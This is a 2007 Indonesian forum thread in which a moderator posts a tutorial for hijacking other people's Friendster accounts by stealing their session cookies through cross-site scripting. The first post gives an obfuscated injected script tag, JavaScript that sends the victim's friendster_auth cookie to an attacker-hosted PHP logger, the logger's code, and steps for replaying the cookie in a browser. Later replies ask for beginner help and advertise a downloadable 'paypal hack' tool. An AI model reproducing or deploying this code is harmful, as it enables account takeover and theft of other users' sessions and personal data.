Friendster Stealling cookie tutorial here...

Discussion in 'Internet & Web' started by kevin168, Sep 7, 2007.

  1. kevin168

    kevin168 Moderator Moderator

    Messages:
    70
    Likes Received:
    71
    Trophy Points:
    0
    hello,
    semua satan friendster, ingin hack account fs temen km?
    hehehehe..........
    akan saya jelaskan tutorialnya d sini, with method stealing cookie...
    UPDATE 31agustus2007

    steal cookie was the ultimate way to hack FS, even change password will be useless if u get other account cookies..

    "REMEMBER NOTHING SAFE IN WEB, THERE MUST BE A WAY"

    1.Target Vurnelable
    Code:
    <&amp;#127;script type="text/javascript" src="http://www.your-site-hosting.com/jsredirect.&amp;#127;js"&amp;#127;><&amp;#127;/script&amp;#127;>
    
    liat titik extension pada script diatas ada tanda " &amp;#127; " sesudah . [titik] dan sebelum [js]
    ini berguna untuk anda gunakan d "describe who i want to meet"
    atau bisa juga d gunakan d "xss media box"

    2.jsredirect
    Code:
    //Divisi cari info browser
    function getUA(){var agent=navigator.userAgent.toLowerCase();var ver=""; var brw_nm=new Array("safari","msie","opera","firefox","mozilla"); if(agent.indexOf(brw_nm[0])!=-1){ver=getVerAgent(brw_nm[0]); return ver;}else if(agent.indexOf(brw_nm[1])!=-1){ver=getVerAgent(brw_nm[1]);return ver;}else if(agent.indexOf(brw_nm[2])!=-1){ver=getVerAgent(brw_nm[2]);return ver;}else if(agent.indexOf(brw_nm[3])!=-1){ver=getVerAgent(brw_nm[3]);return ver;}else if(agent.indexOf(brw_nm[4])!=-1){ver=getVerAgent(brw_nm[4]);return ver;}else {ver="Unknown";return ver;}}function getVerAgent(typ){var brw=navigator.userAgent.toLowerCase();var agent=brw.replace(/ /g,""); var agName_index=agent.indexOf(typ);var agName_endstr=agName_index+typ.length+4;if(agName_endstr==-1)agName_endstr=agent.length;return agent.substring(agName_index,agName_endstr).replace(/;/g,"");}
    //end nyari info browser
    //Divisi encript path link
    function ctA(s){if(s!=''){var uT=s; var tTxt=uT.substring(2,uT.length).split("&#"); var rtStr="";var hs=""; for (i=0;i<tTxt.length;i++){if(dc2hx(tTxt[i]).length<2){rtStr +="%0"+dc2hx(tTxt[i])}else{rtStr +="%"+dc2hx(tTxt[i])}hs=unescape(rtStr);}return hs;}}function dc2hx(n){var hx="0123456789ABCDEF";var msk=0xf;var rtStr=""; while(n!=0){rtStr=hx.charAt(n&msk)+rtStr;n>>>=4;}return rtStr.length==0?"0":rtStr; }
    //end encript
    //MAIN
    var exp=new Date(); var nmCk=exp.setTime(exp.getTime()+216000);
    if(pageViewerID!=""){
    var j=fgetCookie("friendster_journeyp");
    if(fgetCookie("friendster_auth")!=null){
    var loc=window.location.href.replace(/www/g, "profiles");
    fsetCookie("friendster_journeyr",null,"yup",exp,"/",null);
    var c=fgetCookie("friendster_auth");var brw=getUA();
    var dst="";
    window.location.href=dst+'?c='+escape(c)+'&ses='+escape(pageViewerFName)+'~'+pageViewerID+'~@'+pageOwnerID+'~'+brw+'&nx='+loc;}
    if(j==null){fsetCookie("friendster_journeyp",null,"yup",exp,"/",null);window.location.href="http://www.friendster.com/"+pageOwnerID;}
    }
    //--code by kevin168™
    //end MAIN
    save script d atas dan rename menjadi jsredirect.js
    seperti biasa pada

    Code:
    var dst=""
    anda masukan link d mana anda upload file c.php
    nanti hasilnya akan menjadi seperti ini
    Code:
    var dst="http://www.your-site-hosting.com/c.php"
    saya kira udah pada mudeng yah...
    hehehehe......

    3. c.php
    Code:
    <?php
    $cookie=$_GET['c'];
    $id=$_GET['ses'];
    $ref=$_GET['nx'];
    //$ref = $_SERVER['HTTP_REFERER'];
    $fL=fopen('cookie.txt', 'r') or fopen('cookie.txt', 'w') or die("errorOpenfile");
    $buftxt=fgets($fL);
    fclose($fL);
    $pjg=strlen($cookie)<120;
    $valid=strstr($cookie, "mac");
    if(($valid)&&($pjg)&&($cookie!=$buftxt)){
    $ip = getenv ('REMOTE_ADDR');
    $date=date("dmy.g:ia");
    $fl = fopen('logcookie.txt', 'a');
    fwrite($fl, "\r\n$ip;;$id;;$date\r\n$cookie\r\n");
    fclose($fl);
    $fL = fopen('cookie.txt', 'w');
    fwrite($fL, $cookie);
    fclose($fL);}
    header("location:$ref");
    ?>
    save txt d atas lalu rename menjadi c.php
    upload 2 file c.php dan jsredirect.js d web hosting anda.
    juga bikin 2 file txt beri nama cookie.txt dan logcookie.txt
    upload juga satu folder dgn c.php dan jsredirect.js
    next......

    4.nah anda bisa d katakan dapat mencuri cookie apabila melihat tampilan seperti ini d logcookie.txt

    [​IMG]

    5.cookienya trus mau d apain??
    nah ini anda perlu mendownload add-on buat mozilla anda
    ato bisa ikut link ini

    https://addons.mozilla.org/en-US/firefox/downloads/file/2819/add_n_edit_cookies-0.2.1.2-fx+mz.xpi

    itu addon cookie editor yg berguna untuk mengedit cookie yg udh anda dapatkan..

    6.copy paste cookie anda lalu generate cookie d halaman saya ini..

    http://utama168.110mb.com/readck.html

    encode cookie anda...

    7.restart firefox anda, lalu gunakan cookie yg udah d encode.
    pilih cookie editor d tools.
    lalu add cookie isi datanya sebagai berikut
    7.a.bikin cookie baru dengan nama friendster_auth
    7.b.masukan cookie yg sudah d encode d tab ini.
    7.c.hostnya : www.friendster.com
    7.d.pathnya : /
    7.e.set new expiration date menjadi beberapa tahun kedepan

    8.Go To www.friendster.com
    hahahaha........... looks ur in someone else home...
    wekekekeke.............

    Credits: Zhite, me&myself ^__^, mbah th0r, some1@Kaskus,idoenk

    br,
    kevin168
     
    Last edited by a moderator: Sep 7, 2007
  2. CELLULARLABS

    CELLULARLABS Super Moderators Super Moderator

    Messages:
    207
    Likes Received:
    89
    Trophy Points:
    0
    Wong Edan!!!!
     
  3. kevin168

    kevin168 Moderator Moderator

    Messages:
    70
    Likes Received:
    71
    Trophy Points:
    0
    edan2 gini sampeyan juga suka kan mas....
    wekekekeke...........

    br,
    kevin168
     
  4. CELLULARLABS

    CELLULARLABS Super Moderators Super Moderator

    Messages:
    207
    Likes Received:
    89
    Trophy Points:
    0
    hahahahah....siap!!! LAPAN ANEM!!!!

    muach ...


    br,

    CL4BSolo
     
  5. pakdirgo

    pakdirgo Moderator Moderator

    Messages:
    302
    Likes Received:
    151
    Trophy Points:
    53
    rung tau di pisuhi WOng EDAN yo vin...? hiahiahiaiahiaiaiha... :D
     
  6. sebayang

    sebayang New Member

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    tanya

    Bos gue ngga ngerti nih,. Maklum Nubie,. Bisa Ajaran dari basiknya ga?

    1.bikin hostingnya di mana? maksudnya satu folder itu gimana?
    2.trus kita dapet cookienya ketika user FS itu membuka FS-nya? atao gimana?

    Best Regards,

    :blah:
     
  7. mamesa2002

    mamesa2002 New Member

    Messages:
    173
    Likes Received:
    8
    Trophy Points:
    0
    di MONITOR kevin
     
  8. uchu

    uchu Super Moderators Super Moderator

    Messages:
    571
    Likes Received:
    1,783
    Trophy Points:
    103
    gua nggak berani ah,soalnya ggak ngerti soal gituan:D


    soalnya aku Masih newbie banget deh:D
     
  9. kevin168

    kevin168 Moderator Moderator

    Messages:
    70
    Likes Received:
    71
    Trophy Points:
    0
    information...

    today FS was patched the XSS

    hmmmmmmmmmm.............

    sorry no solution for now, still search....

    br,
    kevin168
     
  10. kevin168

    kevin168 Moderator Moderator

    Messages:
    70
    Likes Received:
    71
    Trophy Points:
    0
    1. hosting cari aja yg free bisa coba search d google ato kalo saya make www.110mb.com

    yg d maksud 1 folder ya satu folder d hostingnya bos,
    bos cobain dulu deh daftar hostingnya, tar juga ngerti...

    2. cookie d curi saat nanti kalo seseorang membuka halaman FS kita, bukan kalo mereka buka halaman mereka sendiri...
    hehehehehe...............

    sorry yah buat semua XSS belum dapet lg nih....
    untuk hr ini libur dulu.....

    @uchu
    wah bos merendah nih, sy jadi malu, hehehehe..........
    moso kagak ngerti to bos, bantuin donk cari scriptnya lg, udah d patch nih..
    hihihihi.........

    br,
    kevin168
     
  11. spears

    spears New Member

    Messages:
    41
    Likes Received:
    2
    Trophy Points:
    0
    boss...
    gw aja hosting kagak tau.....????
    apaan tuh..
    ajarin donk....
    gw dah buka situsx 110mb.com tapi gak mudeng.....??????
     
  12. kandi

    kandi New Member

    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    0
    wah kurang jelas neh boss, yg lengkap ya...
     
  13. deeproject

    deeproject New Member

    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    mas.. kalo aku pake fake login cuman yanng jadi masalah cara redirect fs-nya kalo pake flash lama banget lagian sering gagal juga... any clue.. thanxz bro
     
  14. okion

    okion Moderator Moderator

    Messages:
    432
    Likes Received:
    75
    Trophy Points:
    38
    heleh ngapain sob.. hack Fs ndak ada gunanya mendingan hack ntuh mandiri..
    dah ada bug-a ntuh mandiri persis bnged macem BCA..
     
  15. ind_tel

    ind_tel Member

    Messages:
    65
    Likes Received:
    20
    Trophy Points:
    18
    kasus di tutup , thread udah ga bisa di gunakan lagi wkwwkwkkwkwkw
     
  16. overload

    overload Member

    Messages:
    19
    Likes Received:
    2
    Trophy Points:
    13
    DA YG BRU G EUY.........:crazy:
     
  17. LUVIE

    LUVIE New Member

    Messages:
    21
    Likes Received:
    13
    Trophy Points:
    0
    yang suka hacking nyobain tool ini yaaa!!!
    zmaimpaypalhackv3.0
    :rock:
    tutorialnya da di yotobe
     
  18. LUVIE

    LUVIE New Member

    Messages:
    21
    Likes Received:
    13
    Trophy Points:
    0
    yang suka hacking nyobain tool ini yaaa!!!
    zmaimpaypalhackv3.0
    http://www.ziddu.com/download/3322937/zmaimpaypalhackv3.0.rar.html
    tutorialnya da di yotobe
     
  19. betrend

    betrend New Member

    Messages:
    26
    Likes Received:
    31
    Trophy Points:
    0
    Luvie..., password rarnya apaan ?!! ko ga ada passwordnya.

    tolong dunk di upload disisni
     
  20. jokosamudro

    jokosamudro New Member

    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    0
    edannnnnnnnnnnn kabehhhhhhhhhhhhh xixixixixixixi.............
     

Share This Page